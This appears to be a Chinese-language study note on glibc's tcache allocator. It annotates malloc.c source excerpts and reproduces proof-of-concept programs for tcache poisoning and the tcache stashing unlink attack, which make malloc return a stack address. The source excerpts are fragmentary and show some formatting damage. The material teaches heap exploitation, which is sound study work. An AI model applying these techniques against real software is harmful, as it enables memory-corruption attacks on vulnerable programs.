/* We want 64 entries. This is an arbitrary limit, which tunables can reduce. */ # define TCACHE_MAX_BINS 64 # define MAX_TCACHE_SIZE tidx2usize (TCACHE_MAX_BINS-1)
/* Only used to pre-fill the tunables. */ # define tidx2usize(idx) (((size_t) idx) * MALLOC_ALIGNMENT + MINSIZE - SIZE_SZ) //根据tcache下标求解其中堆块的大小 /* When "x" is from chunksize(). */ # define csize2tidx(x) (((x) - MINSIZE + MALLOC_ALIGNMENT - 1) / MALLOC_ALIGNMENT) //根据堆块大小求解对应tcache下标 /* When "x" is a user-provided size. */ # define usize2tidx(x) csize2tidx (request2size (x)) //根据堆块的mem区大小,首先计算得到堆块的整体大小(包括元数据)然后计算对应tcache下标 /* With rounding and alignment, the bins are... idx 0 bytes 0..24 (64-bit) or 0..12 (32-bit) idx 1 bytes 25..40 or 13..20 idx 2 bytes 41..56 or 21..28 etc. */
/* This is another arbitrary limit, which tunables can change. Each tcache bin will hold at most this number of chunks. */ # define TCACHE_FILL_COUNT 7
/* Caller must ensure that we know tc_idx is valid and there's available chunks to remove. */ static __always_inline void * tcache_get(size_t tc_idx)//从tc_idx桶子中拿出一个堆块 { tcache_entry *e = tcache->entries[tc_idx]; assert (tc_idx < TCACHE_MAX_BINS); assert (tcache->entries[tc_idx] > 0); tcache->entries[tc_idx] = e->next; --(tcache->counts[tc_idx]); return (void *) e; }
staticvoid tcache_thread_shutdown(void) {//线程死亡时释放这个线程的tcache,实际上调用free函数释放该线程的tcache中的堆块 int i; tcache_perthread_struct *tcache_tmp = tcache;
if (!tcache) return;
/* Disable the tcache and prevent it from being reinitialized. */ tcache = NULL; tcache_shutting_down = true;
/* Free all of the entries and the tcache itself back to the arena heap for coalescing. */ for (i = 0; i < TCACHE_MAX_BINS; ++i) { while (tcache_tmp->entries[i]) { tcache_entry *e = tcache_tmp->entries[i]; tcache_tmp->entries[i] = e->next; __libc_free (e); } }
if (ar_ptr != NULL) __libc_lock_unlock (ar_ptr->mutex);
/* In a low memory situation, we may not be able to allocate memory - in which case, we just keep trying later. However, we typically do this very early, so either there is sufficient memory, or there isn't enough memory to do non-trivial allocations anyway. */ if (victim) { tcache = (tcache_perthread_struct *) victim; memset (tcache, 0, sizeof (tcache_perthread_struct)); }
if (victim != NULL) { if (SINGLE_THREAD_P)//单线程的情况 *fb = victim->fd; else//多线程的情况 REMOVE_FB(fb, pp, victim);//首先拿出一个堆块来 if (__glibc_likely(victim != NULL)) { size_t victim_idx = fastbin_index(chunksize(victim)); if (__builtin_expect(victim_idx != idx, 0)) malloc_printerr("malloc(): memory corruption (fast)"); check_remalloced_chunk(av, victim, nb); #if USE_TCACHE //已经拿出了一个符合要求的堆块,剩余的堆块放到tcache中缓存(直到tcache满),如果tcache满了就不再往里塞了 /* While we're here, if we see other chunks of the same size, stash them in the tcache. */ size_t tc_idx = csize2tidx(nb); if (tcache && tc_idx < mp_.tcache_bins) { mchunkptr tc_victim;
/* While bin not empty and tcache not full, copy chunks. */ while (tcache->counts[tc_idx] < mp_.tcache_count && (tc_victim = *fb) != NULL) { if (SINGLE_THREAD_P) *fb = tc_victim->fd; else { REMOVE_FB(fb, pp, tc_victim); if (__glibc_unlikely(tc_victim == NULL)) break; } tcache_put(tc_victim, tc_idx); } } #endif void *p = chunk2mem(victim); alloc_perturb(p, bytes); return p; } } }
if (in_smallbin_range(nb)) { idx = smallbin_index(nb); bin = bin_at(av, idx);
if ((victim = last(bin)) != bin)//首先取出一个last(bin)堆块来给victim { bck = victim->bk; if (__glibc_unlikely(bck->fd != victim)) malloc_printerr("malloc(): smallbin double linked list corrupted"); set_inuse_bit_at_offset(victim, nb); bin->bk = bck;//将victim从链上摘下来 bck->fd = bin;
if (av != &main_arena) set_non_main_arena(victim); check_malloced_chunk(av, victim, nb); #if USE_TCACHE //本桶子中剩余的堆块塞进tcache,塞满7个为止,多余的仍在smallbin中放着 /* While we're here, if we see other chunks of the same size, stash them in the tcache. */ size_t tc_idx = csize2tidx(nb); if (tcache && tc_idx < mp_.tcache_bins) { mchunkptr tc_victim;
/* While bin not empty and tcache not full, copy chunks over. */ while (tcache->counts[tc_idx] < mp_.tcache_count && (tc_victim = last(bin)) != bin) { if (tc_victim != 0) { bck = tc_victim->bk; set_inuse_bit_at_offset(tc_victim, nb); if (av != &main_arena) set_non_main_arena(tc_victim); bin->bk = bck; bck->fd = bin;
/* If a small request, try to use last remainder if it is the only chunk in unsorted bin. This helps promote locality for runs of consecutive small requests. This is the only exception to best-fit, and applies only when there is no exact fit for a small chunk. */
if (size == nb)//如果当前堆块的大小符合要求,不会立刻分配,首先应该放到tcache中 { set_inuse_bit_at_offset(victim, size); if (av != &main_arena) set_non_main_arena(victim); #if USE_TCACHE /* Fill cache first, return to user only if cache fills. We may return one of these chunks later. */ if (tcache_nb && tcache->counts[tc_idx] < mp_.tcache_count) { tcache_put(victim, tc_idx); return_cached = 1;//记录至少有一个堆块放到了tcache,待会儿就可以从tcache中拿堆块了 continue; //continue直接跳到while一开始拿下一个堆块了 } else//直到对应tcache存满了才会直接进行分配 { #endif check_malloced_chunk(av, victim, nb); void *p = chunk2mem(victim); alloc_perturb(p, bytes); return p; #if USE_TCACHE } #endif } //到此说明victim既不是last_remainder,大小也不是正合适 /* place chunk in bin */
/* maintain large bins in sorted order */ if (fwd != bck) { /* Or with inuse bit to speed comparisons */ size |= PREV_INUSE; /* if smaller than smallest, bypass loop below */ assert(chunk_main_arena(bck->bk)); if ((unsignedlong)(size) < (unsignedlong)chunksize_nomask(bck->bk)) { fwd = bck; bck = bck->bk;
#if USE_TCACHE /* If we've processed as many chunks as we're allowed while filling the cache, return one of the cached ones. */ ++tcache_unsorted_count;//unsortedbin中最大可以容忍的缓存次数 if (return_cached && mp_.tcache_unsorted_limit > 0 && tcache_unsorted_count > mp_.tcache_unsorted_limit) { return tcache_get(tc_idx); }//结算阶段,如果return_cached是正合适大小的堆块入tcache的标记,如果被置1说明至少能从tcache中找到一个合适的堆块 #endif
#define MAX_ITERS 10000 if (++iters >= MAX_ITERS) break;//unsortedbin这里的循环最多10000次 }
跳出unsortedbin循环,再检查一次tcache中是否有合适堆块
1 2 3 4 5 6 7 8
#if USE_TCACHE /* If all the small chunks we found ended up cached, return one now. */ if (return_cached) { return tcache_get(tc_idx); } #endif
printf("This file demonstrates a simple tcache poisoning attack by tricking malloc into\n" "returning a pointer to an arbitrary location (in this case, the stack).\n" "The attack is very similar to fastbin corruption attack.\n"); printf("After the patch https://sourceware.org/git/?p=glibc.git;a=commit;h=77dc0d8643aa99c92bf671352b0a8adde705896f,\n" "We have to create and free one more chunk for padding before fd pointer hijacking.\n\n");
size_t stack_var; printf("The address we want malloc() to return is %p.\n", (char *)&stack_var);
printf("Freeing the buffers...\n"); free(a); free(b);
printf("Now the tcache list has [ %p -> %p ].\n", b, a); printf("We overwrite the first %lu bytes (fd/next pointer) of the data at %p\n" "to point to the location to control (%p).\n", sizeof(intptr_t), b, &stack_var); b[0] = (intptr_t)&stack_var; printf("Now the tcache list has [ %p -> %p ].\n", b, &stack_var);
printf("1st malloc(128): %p\n", malloc(128)); printf("Now the tcache list has [ %p ].\n", &stack_var);
printf("This file demonstrates the stashing unlink attack on tcache.\n\n"); printf("This poc has been tested on both glibc 2.27 and glibc 2.29.\n\n"); printf("This technique can be used when you are able to overwrite the victim->bk pointer. Besides, it's necessary to alloc a chunk with calloc at least once. Last not least, we need a writable address to bypass check in glibc\n\n"); printf("The mechanism of putting smallbin into tcache in glibc gives us a chance to launch the attack.\n\n"); printf("This technique allows us to write a libc addr to wherever we want and create a fake chunk wherever we need. In this case we'll create the chunk on the stack.\n\n");
// stack_var emulate the fake_chunk we want to alloc to printf("Stack_var emulates the fake chunk we want to alloc to.\n\n"); printf("First let's write a writeable address to fake_chunk->bk to bypass bck->fd = bin in glibc. Here we choose the address of stack_var[2] as the fake bk. Later we can see *(fake_chunk->bk + 0x10) which is stack_var[4] will be a libc addr after attack.\n\n");
stack_var[3] = (unsignedlong)(&stack_var[2]);
printf("You can see the value of fake_chunk->bk is:%p\n\n",(void*)stack_var[3]); printf("Also, let's see the initial value of stack_var[4]:%p\n\n",(void*)stack_var[4]); printf("Now we alloc 9 chunks with malloc.\n\n");
//now we malloc 9 chunks for(int i = 0;i < 9;i++){ chunk_lis[i] = (unsignedlong*)malloc(0x90); }
//put 7 chunks into tcache printf("Then we free 7 of them in order to put them into tcache. Carefully we didn't free a serial of chunks like chunk2 to chunk9, because an unsorted bin next to another will be merged into one after another malloc.\n\n");
for(int i = 3;i < 9;i++){ free(chunk_lis[i]); }
printf("As you can see, chunk1 & [chunk3,chunk8] are put into tcache bins while chunk0 and chunk2 will be put into unsorted bin.\n\n");
//last tcache bin free(chunk_lis[1]); //now they are put into unsorted bin free(chunk_lis[0]); free(chunk_lis[2]);
//convert into small bin printf("Now we alloc a chunk larger than 0x90 to put chunk0 and chunk2 into small bin.\n\n");
malloc(0xa0);// size > 0x90
//now 5 tcache bins printf("Then we malloc two chunks to spare space for small bins. After that, we now have 5 tcache bins and 2 small bins\n\n");
malloc(0x90); malloc(0x90);
printf("Now we emulate a vulnerability that can overwrite the victim->bk pointer into fake_chunk addr: %p.\n\n",(void*)stack_var);
//trigger the attack printf("Finally we alloc a 0x90 chunk with calloc to trigger the attack. The small bin preiously freed will be returned to user, the other one and the fake_chunk were linked into tcache bins.\n\n");
calloc(1,0x90);
printf("Now our fake chunk has been put into tcache bin[0xa0] list. Its fd pointer now point to next free chunk: %p and the bck->fd has been changed into a libc addr: %p\n\n",(void*)stack_var[2],(void*)stack_var[4]);
//malloc and return our fake chunk on stack target = malloc(0x90);
printf("As you can see, next malloc(0x90) will return the region our fake chunk: %p\n",(void*)target);
assert(target == &stack_var[2]); return0; }
首先顺序分配9个堆块
1 2 3
for(int i = 0;i < 9;i++){ chunk_lis[i] = (unsignedlong*)malloc(0x90); }
然后把[3,8]这六个放到tcache中
1 2 3
for(int i = 3;i < 9;i++){ free(chunk_lis[i]); }
然后将1放到tcache中
1
free(chunk_lis[1]);
此时tcache中的结构
1 2
flowchart LR t["tcache[idx]"]---->1---->8---->7---->6---->5---->4---->3